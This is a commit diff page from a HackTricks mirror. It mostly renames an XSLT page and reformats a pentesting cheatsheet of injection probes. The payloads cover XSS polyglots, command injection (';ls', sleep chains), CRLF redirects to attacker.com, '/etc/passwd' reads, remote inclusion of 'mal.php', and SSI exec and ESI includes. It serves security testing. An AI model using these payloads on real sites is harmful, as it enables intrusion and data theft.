Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 04:33:28 +00:00
Code Issues Projects Releases Packages Wiki Activity

GITBOOK-4163: change request with no subject merged in GitBook

Browse source
This commit is contained in:
CPol 2023-11-09 15:12:11 +00:00 committed by gitbook-bot
parent 69199de432
commit 04c2dccb6f
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
9 changed files with 52 additions and 64 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
SUMMARY.md
View file

@ -651,7 +651,7 @@
* [WebSocket Attacks](pentesting-web/websocket-attacks.md) * [WebSocket Attacks](pentesting-web/websocket-attacks.md)
* [Web Tool - WFuzz](pentesting-web/web-tool-wfuzz.md) * [Web Tool - WFuzz](pentesting-web/web-tool-wfuzz.md)
* [XPATH injection](pentesting-web/xpath-injection.md) * [XPATH injection](pentesting-web/xpath-injection.md)
* [XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations)](pentesting-web/xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md) * [XSLT Server Side Injection (Extensible Stylesheet Language Transformations)](pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
* [XXE - XEE - XML External Entity](pentesting-web/xxe-xee-xml-external-entity.md) * [XXE - XEE - XML External Entity](pentesting-web/xxe-xee-xml-external-entity.md)
* [XSS (Cross Site Scripting)](pentesting-web/xss-cross-site-scripting/README.md) * [XSS (Cross Site Scripting)](pentesting-web/xss-cross-site-scripting/README.md)
* [Abusing Service Workers](pentesting-web/xss-cross-site-scripting/abusing-service-workers.md) * [Abusing Service Workers](pentesting-web/xss-cross-site-scripting/abusing-service-workers.md)

2
mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md
View file

@ -20,7 +20,7 @@
\\ \\
***
**From**: [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1)\ **From**: [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1)\
**APK**: [https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk](https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk) **APK**: [https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk](https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk)

96
pentesting-web/pocs-and-polygloths-cheatsheet/README.md
View file

@ -1,33 +1,28 @@
# Reflecting Techniques - PoCs and Polygloths CheatSheet
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
</details> </details>
The goal of these PoCs and Polygloths is to give the tester a fast **summary** of vulnerabilities he may exploit if his **input is somehow being reflected in the response**. The goal of these PoCs and Polygloths is to give the tester a fast **summary** of vulnerabilities he may exploit if his **input is somehow being reflected in the response**.
{% hint style="warning" %} {% hint style="warning" %}
This **cheatsheet doesn't propose a comprehensive list of tests for each vulnerability**, just some basic ones. If you are looking for more comprehensive tests, access each vulnerability proposed. This **cheatsheet doesn't propose a comprehensive list of tests for each vulnerability**, just some basic ones. If you are looking for more comprehensive tests, access each vulnerability proposed.
{% endhint %} {% endhint %}
{% hint style="danger" %} {% hint style="danger" %}
You **won't find Content-Type dependant injections like XXE**, as usually you will try those yourself if you find a request sending xml data. You **won't also find database injections** here as even if some content might be reflected it depends heavily on the backend DB technology and structure. You **won't find Content-Type dependant injections like XXE**, as usually you will try those yourself if you find a request sending xml data. You **won't also find database injections** here as even if some content might be reflected it depends heavily on the backend DB technology and structure.
{% endhint %} {% endhint %}
# Polygloths list ## Polygloths list
```python ```python
{{7*7}}[7*7] {{7*7}}[7*7]
@ -69,24 +64,24 @@ javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembe
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT> ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
``` ```
# [Client Side Template Injection](../client-side-template-injection-csti.md) ## [Client Side Template Injection](../client-side-template-injection-csti.md)
## Basic Tests ### Basic Tests
``` ```
{{7*7}} {{7*7}}
[7*7] [7*7]
``` ```
## Polygloths ### Polygloths
```bash ```bash
{{7*7}}[7*7] {{7*7}}[7*7]
``` ```
# [Command Injection](../command-injection.md) ## [Command Injection](../command-injection.md)
## Basic Tests ### Basic Tests
```bash ```bash
;ls ;ls
@ -99,16 +94,16 @@ javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembe
$(ls) $(ls)
``` ```
## Polygloths ### Polygloths
```bash ```bash
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS} 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/ /*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
``` ```
# [CRLF](../crlf-0d-0a.md) ## [CRLF](../crlf-0d-0a.md)
## Basic Tests ### Basic Tests
```bash ```bash
%0d%0aLocation:%20http://attacker.com %0d%0aLocation:%20http://attacker.com
@ -117,17 +112,17 @@ $(ls)
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E %0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
``` ```
# Dangling Markup ## Dangling Markup
## Basic Tests ### Basic Tests
```markup ```markup
<br><b><h1>THIS IS AND INJECTED TITLE </h1> <br><b><h1>THIS IS AND INJECTED TITLE </h1>
``` ```
# [File Inclusion/Path Traversal](../file-inclusion/) ## [File Inclusion/Path Traversal](../file-inclusion/)
## Basic Tests ### Basic Tests
```bash ```bash
/etc/passwd /etc/passwd
@ -142,9 +137,9 @@ http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php \\asdasdasdasd.burpcollab.com/mal.php
``` ```
# [Open Redirect](../open-redirect.md) / [Server Side Request Forgery](../ssrf-server-side-request-forgery/) ## [Open Redirect](../open-redirect.md) / [Server Side Request Forgery](../ssrf-server-side-request-forgery/)
## Basic Tests ### Basic Tests
```bash ```bash
www.whitelisted.com www.whitelisted.com
@ -154,9 +149,9 @@ https://google.com
javascript:alert(1) javascript:alert(1)
``` ```
# [ReDoS](../regular-expression-denial-of-service-redos.md) ## [ReDoS](../regular-expression-denial-of-service-redos.md)
## Basic Tests ### Basic Tests
```bash ```bash
(\\w*)+$ (\\w*)+$
@ -164,9 +159,9 @@ javascript:alert(1)
((a+)+)+$ ((a+)+)+$
``` ```
# [Server Side Inclusion/Edge Side Inclusion](../server-side-inclusion-edge-side-inclusion-injection.md) ## [Server Side Inclusion/Edge Side Inclusion](../server-side-inclusion-edge-side-inclusion-injection.md)
## Basic Tests ### Basic Tests
```markup ```markup
<!--#echo var="DATE_LOCAL" --> <!--#echo var="DATE_LOCAL" -->
@ -175,19 +170,19 @@ javascript:alert(1)
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>> x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
``` ```
## Polygloths ### Polygloths
```markup ```markup
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>> <!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
``` ```
# [Server Side Request Forgery](../ssrf-server-side-request-forgery/) ## [Server Side Request Forgery](../ssrf-server-side-request-forgery/)
The same tests used for Open Redirect can be used here. The same tests used for Open Redirect can be used here.
# [Server Side Template Injection](../ssti-server-side-template-injection/) ## [Server Side Template Injection](../ssti-server-side-template-injection/)
## Basic Tests ### Basic Tests
```markup ```markup
${{<%[%'"}}%\ ${{<%[%'"}}%\
@ -198,30 +193,30 @@ ${{7*7}}
#{7*7} #{7*7}
``` ```
## Polygloths ### Polygloths
```python ```python
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\ {{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
``` ```
# [XSLT Server Side Injection](../xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md) ## [XSLT Server Side Injection](../xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
## Basic Tests ### Basic Tests
```markup ```markup
<xsl:value-of select="system-property('xsl:version')" /> <xsl:value-of select="system-property('xsl:version')" />
<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include> <esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
``` ```
## Polygloths ### Polygloths
```markup ```markup
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include> <xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
``` ```
# XSS ## XSS
## Basic Tests ### Basic Tests
```markup ```markup
" onclick=alert() a=" " onclick=alert() a="
@ -229,7 +224,7 @@ ${{7*7}}
javascript:alert() javascript:alert()
``` ```
## Polygloths ### Polygloths
```markup ```markup
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//> javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
@ -259,21 +254,14 @@ javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onm
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=document.location=`//localhost/mH`//> javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=document.location=`//localhost/mH`//>
``` ```
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
</details> </details>

4
pentesting-web/saml-attacks/README.md
View file

@ -175,8 +175,8 @@ Check also this talk: [https://www.youtube.com/watch?v=WHn-6xHL7mI](https://www.
For more information about XSLT go to: For more information about XSLT go to:
{% content-ref url="../xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md" %} {% content-ref url="../xslt-server-side-injection-extensible-stylesheet-language-transformations.md" %}
[xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md](../xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md) [xslt-server-side-injection-extensible-stylesheet-language-transformations.md](../xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
{% endcontent-ref %} {% endcontent-ref %}
Extensible Stylesheet Language Transformation (XSLT) is a Turing-complete language for transforming XML documents into other document types such as HTML, JSON, or PDF. An important aspect to note here is that **the attack doesnt require a valid signature to succeed**. The reason for this is that **the XSLT transformation occurs before the digital signature is processed for verification**. Basically, we need a signed SAML Response to perform the attack, but the signature can be self-signed or invalid. Extensible Stylesheet Language Transformation (XSLT) is a Turing-complete language for transforming XML documents into other document types such as HTML, JSON, or PDF. An important aspect to note here is that **the attack doesnt require a valid signature to succeed**. The reason for this is that **the XSLT transformation occurs before the digital signature is processed for verification**. Basically, we need a signed SAML Response to perform the attack, but the signature can be self-signed or invalid.

4
pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md
View file

@ -243,8 +243,8 @@ The XSLT file:
Check the XSLT page: Check the XSLT page:
{% content-ref url="xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md" %} {% content-ref url="xslt-server-side-injection-extensible-stylesheet-language-transformations.md" %}
[xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md](xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md) [xslt-server-side-injection-extensible-stylesheet-language-transformations.md](xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
{% endcontent-ref %} {% endcontent-ref %}
### References ### References

2
pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md
View file

@ -488,7 +488,7 @@ The following endpoint will allow an attacker to dump all the keys in the redis
http://localhost:9121/scrape?target=redis://127.0.0.1:7001&check-keys=* http://localhost:9121/scrape?target=redis://127.0.0.1:7001&check-keys=*
``` ```
***
**Possible via Gopher** **Possible via Gopher**

4
pentesting-web/web-vulnerabilities-methodology/README.md
View file

@ -26,7 +26,7 @@ Nowadays **web** **applications** usually **uses** some kind of **intermediary**
* [ ] [**H2C Smuggling**](../h2c-smuggling.md) * [ ] [**H2C Smuggling**](../h2c-smuggling.md)
* [ ] [**Server Side Inclusion/Edge Side Inclusion**](../server-side-inclusion-edge-side-inclusion-injection.md) * [ ] [**Server Side Inclusion/Edge Side Inclusion**](../server-side-inclusion-edge-side-inclusion-injection.md)
* [ ] [**Uncovering Cloudflare**](../../network-services-pentesting/pentesting-web/uncovering-cloudflare.md) * [ ] [**Uncovering Cloudflare**](../../network-services-pentesting/pentesting-web/uncovering-cloudflare.md)
* [ ] [**XSLT Server Side Injection**](../xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md) * [ ] [**XSLT Server Side Injection**](../xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
* [ ] [**Proxy / WAF Protections Bypass**](../proxy-waf-protections-bypass.md) * [ ] [**Proxy / WAF Protections Bypass**](../proxy-waf-protections-bypass.md)
## **User input** ## **User input**
@ -51,7 +51,7 @@ If the introduced data may somehow be reflected in the response, the page might
* [ ] [**Server Side Request Forgery**](../ssrf-server-side-request-forgery/) * [ ] [**Server Side Request Forgery**](../ssrf-server-side-request-forgery/)
* [ ] [**Server Side Template Injection**](../ssti-server-side-template-injection/) * [ ] [**Server Side Template Injection**](../ssti-server-side-template-injection/)
* [ ] [**Reverse Tab Nabbing**](../reverse-tab-nabbing.md) * [ ] [**Reverse Tab Nabbing**](../reverse-tab-nabbing.md)
* [ ] [**XSLT Server Side Injection**](../xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md) * [ ] [**XSLT Server Side Injection**](../xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
* [ ] [**XSS**](../xss-cross-site-scripting/) * [ ] [**XSS**](../xss-cross-site-scripting/)
* [ ] [**XSSI**](../xssi-cross-site-script-inclusion.md) * [ ] [**XSSI**](../xssi-cross-site-script-inclusion.md)
* [ ] [**XS-Search**](../xs-search.md) * [ ] [**XS-Search**](../xs-search.md)

0
pentesting-web/xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md → pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md
View file

2
pentesting-web/xss-cross-site-scripting/README.md
View file

@ -1480,7 +1480,7 @@ Got XSS on a **site that uses caching**? Try **upgrading that to SSRF** through
``` ```
Use it to bypass cookie restrictions, XSS filters and much more!\ Use it to bypass cookie restrictions, XSS filters and much more!\
More information about this technique here: [**XSLT**](../xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md). More information about this technique here: [**XSLT**](../xslt-server-side-injection-extensible-stylesheet-language-transformations.md).
### XSS in dynamic created PDF ### XSS in dynamic created PDF